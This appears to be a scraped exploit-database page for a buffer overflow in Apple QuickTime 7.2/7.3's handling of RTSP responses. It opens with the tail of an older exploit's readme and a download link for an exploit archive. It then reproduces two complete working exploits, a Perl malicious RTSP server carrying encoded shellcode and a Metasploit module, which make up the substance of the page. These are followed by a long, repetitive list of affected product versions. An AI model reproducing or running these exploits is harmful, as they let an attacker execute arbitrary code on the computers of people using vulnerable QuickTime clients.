playlist.mov - play list with rtsp server link (edit "_server_emulator_ip" with address of rtsp-server emulator started and place to public web-folder)
Try to load index.html in your browser from remote web- server with installed exploit.
Greetz 2:
- str0ke & milw0rm
- shinnai
- h07 for bug publication
- muts & InTel for code play'ng ( but guyz, U`rs releases coded with SEH overwrite... It's so many problems
with shellcode modification and stable exploitation on different systems...
for whats?
We can overwrite EIP with buffer generation like 65535 bytes. In this release EIP -> 0x0c0c0c0c )
Fuckz 2:
- wslabi.com (too stupid resource for selling shit)
- ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz)
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz)
# milw0rm.com [2007-11-27]
Exploit Database EDB-ID : 11027
Publication date : 2010-01-05 23h00 +00:00
Author : jacky
EDB Verified : Yes
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $junk="A"x991;
my $nseh="\xeb\x06\x90\x90";
my $seh="\x4e\x28\x86\x66"; #\x4e\x28\x86\x66
my $nops="\x90"x20;
my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30" .
"\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34" .
"\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b" .
"\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47" .
"\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c" .
"\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31" .
"\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32" .
"\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c" .
"\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70" .
"\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48" .
"\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53" .
"\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56" .
"\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f" .
"\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64" .
"\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75" .
"\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63" .
"\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c" .
"\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30" .
"\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71" .
"\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f" .
"\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a" .
"\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70" .
"\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f" .
"\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38" .
"\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c" .
"\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35" .
"\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a" .
"\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c" .
"\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
my $header = "RTSP/1.0 200 OK\r\n".
"CSeq: 1\r\n".
"Date: 0x00 :P\r\n".
"Content-Base: rtsp://0.0.0.0/1.mp3/\r\n".
"Content-Type: $payload\r\n".
"Content-Length: 334\r\n".
"\r\n";
my $body = "v=0\r\n".
"o=- 16689332712 1 IN IP4 0.0.0.0\r\n".
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"i=1.mp3\r\n".
"t=0 0\r\n".
"a=tool:ciamciaramcia\r\n".
"a=type:broadcast\r\n".
"a=control:*\r\n".
"a=range:npt=0-213.077\r\n".
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n".
"a=x-qt-text-inf:1.mp3\r\n".
"m=audio 0 RTP/AVP 14\r\n".
"c=IN IP4 0.0.0.0\r\n".
"a=control:track1\r\n";
my $evil=$header.$body;
my $port=shift || 554;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+]Listening on [RTSP]554\n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print CLIENT $evil;
print "[+]Connection Accepted\n";
print "[+]Sending Evil Payload\n";
}
close CLIENT;
print "[+]Connection closed\n";
Exploit Database EDB-ID : 16424
Publication date : 2010-05-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: apple_quicktime_rtsp_response.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long
RTSP response to a client, an attacker may be able to execute arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2007-6166' ],
[ 'OSVDB', '40876' ],
[ 'BID', '26549' ],
[ 'URL', 'http://milw0rm.com/exploits/4648' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ], # pop esi; pop ebx; ret / QuickTimeStreaming.qtx (7.3.0.70)
],
'Privileged' => false,
'DisclosureDate' => 'Nov 23 2007',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
client.get_once
buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length)
strname = rand_text_alpha(rand(75) + 1)
date = Time.now
num = rand(1).to_s
header = "RTSP/1.0 200 OK\r\n"
header << "CSeq: 1\r\n"
header << "Date: #{date}\r\n"
header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n"
header << "Content-Type: #{buffer}\r\n"
header << "Content-Length: #{strname.length}\r\n\r\n"
body = "v=#{num}\r\n"
body << "o=#{strname}\r\n"
body << "s=#{strname}\r\n"
body << "i=#{strname}\r\n"
body << "t=#{num}\r\n"
body << "a=tool:#{strname}\r\n"
body << "a=type:#{strname}\r\n"
body << "a=control:#{strname}\r\n"
body << "a=range:#{strname}\r\n"
body << "a=x-qt-text-nam:#{strname}\r\n"
body << "a=x-qt-text-inf:#{strname}\r\n"
body << "m=#{strname}\r\n"
body << "c=#{strname}\r\n"
body << "a=control:#{strname}\r\n"
sploit = header + body
print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
client.put(sploit)
handler(client)
service.close_client(client)
end
end
Products Mentioned
Configuraton 0
Apple>>Quicktime >> Version To (including) 7.3
- Apple>>Quicktime >> Version - (Open CPE detail)
- Apple>>Quicktime >> Version 3 (Open CPE detail)
- Apple>>Quicktime >> Version 3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.3.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.4.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.8 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.0 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.2.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.3 (Open CPE detail)
Apple>>Quicktime >> Version -
- Apple>>Quicktime >> Version - (Open CPE detail)
Apple>>Quicktime >> Version 3.0
- Apple>>Quicktime >> Version 3.0 (Open CPE detail)
Apple>>Quicktime >> Version 4.1.2
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 4.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 5.0
- Apple>>Quicktime >> Version 5.0 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.1
- Apple>>Quicktime >> Version 5.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 5.0.2
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 5.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 6.0
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
- Apple>>Quicktime >> Version 6.0 (Open CPE detail)
Apple>>Quicktime >> Version 6.1
- Apple>>Quicktime >> Version 6.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5
- Apple>>Quicktime >> Version 6.5 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.1
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.1 (Open CPE detail)
Apple>>Quicktime >> Version 6.5.2
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
- Apple>>Quicktime >> Version 6.5.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0
- Apple>>Quicktime >> Version 7.0 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.1
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.2
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.3
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.0.4
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.0.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1
- Apple>>Quicktime >> Version 7.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.1
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.1 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.2
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.2 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.3
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.3 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.4
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.4 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.5
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.5 (Open CPE detail)
Apple>>Quicktime >> Version 7.1.6
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
- Apple>>Quicktime >> Version 7.1.6 (Open CPE detail)
Apple>>Quicktime >> Version 7.2
- Apple>>Quicktime >> Version 7.2 (Open CPE detail)
Microsoft>>Windows_vista >> Version *
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
- Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version *
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
- Microsoft>>Windows_xp >> Version - (Open CPE detail)
Configuraton 0
Apple>>Safari >> Version *
- Apple>>Safari >> Version - (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0b1 (Open CPE detail)
- Apple>>Safari >> Version 1.0.0b2 (Open CPE detail)
- Apple>>Safari >> Version 1.0.1 (Open CPE detail)
- Apple>>Safari >> Version 1.0.2 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0.3 (Open CPE detail)
- Apple>>Safari >> Version 1.0b1 (Open CPE detail)
- Apple>>Safari >> Version 1.1 (Open CPE detail)
- Apple>>Safari >> Version 1.1.0 (Open CPE detail)
- Apple>>Safari >> Version 1.1.1 (Open CPE detail)
- Apple>>Safari >> Version 1.2 (Open CPE detail)
- Apple>>Safari >> Version 1.2.0 (Open CPE detail)
- Apple>>Safari >> Version 1.2.1 (Open CPE detail)
- Apple>>Safari >> Version 1.2.2 (Open CPE detail)
- Apple>>Safari >> Version 1.2.3 (Open CPE detail)
- Apple>>Safari >> Version 1.2.4 (Open CPE detail)
- Apple>>Safari >> Version 1.2.5 (Open CPE detail)
- Apple>>Safari >> Version 1.3 (Open CPE detail)
- Apple>>Safari >> Version 1.3.0 (Open CPE detail)
- Apple>>Safari >> Version 1.3.1 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 1.3.2 (Open CPE detail)
- Apple>>Safari >> Version 2 (Open CPE detail)
- Apple>>Safari >> Version 2.0 (Open CPE detail)
- Apple>>Safari >> Version 2.0.0 (Open CPE detail)
- Apple>>Safari >> Version 2.0.1 (Open CPE detail)
- Apple>>Safari >> Version 2.0.2 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.3 (Open CPE detail)
- Apple>>Safari >> Version 2.0.4 (Open CPE detail)
- Apple>>Safari >> Version 2.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3 (Open CPE detail)
- Apple>>Safari >> Version 3.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0 (Open CPE detail)
- Apple>>Safari >> Version 3.0.0b (Open CPE detail)
- Apple>>Safari >> Version 3.0.0b (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1 (Open CPE detail)
- Apple>>Safari >> Version 3.0.1b (Open CPE detail)
- Apple>>Safari >> Version 3.0.1b (Open CPE detail)
- Apple>>Safari >> Version 3.0.2 (Open CPE detail)
- Apple>>Safari >> Version 3.0.2 (Open CPE detail)
- Apple>>Safari >> Version 3.0.2b (Open CPE detail)
- Apple>>Safari >> Version 3.0.2b (Open CPE detail)
- Apple>>Safari >> Version 3.0.3 (Open CPE detail)
- Apple>>Safari >> Version 3.0.3 (Open CPE detail)
- Apple>>Safari >> Version 3.0.3b (Open CPE detail)
- Apple>>Safari >> Version 3.0.3b (Open CPE detail)
- Apple>>Safari >> Version 3.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3.0.4 (Open CPE detail)
- Apple>>Safari >> Version 3.0.4b (Open CPE detail)
- Apple>>Safari >> Version 3.0.4b (Open CPE detail)
- Apple>>Safari >> Version 3.0.5 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0 (Open CPE detail)
- Apple>>Safari >> Version 3.1.0b (Open CPE detail)
- Apple>>Safari >> Version 3.1.0b (Open CPE detail)
- Apple>>Safari >> Version 3.1.1 (Open CPE detail)
- Apple>>Safari >> Version 3.1.1b (Open CPE detail)
- Apple>>Safari >> Version 3.1.2 (Open CPE detail)
- Apple>>Safari >> Version 3.1.2b (Open CPE detail)
- Apple>>Safari >> Version 3.2.0 (Open CPE detail)
- Apple>>Safari >> Version 3.2.0b (Open CPE detail)
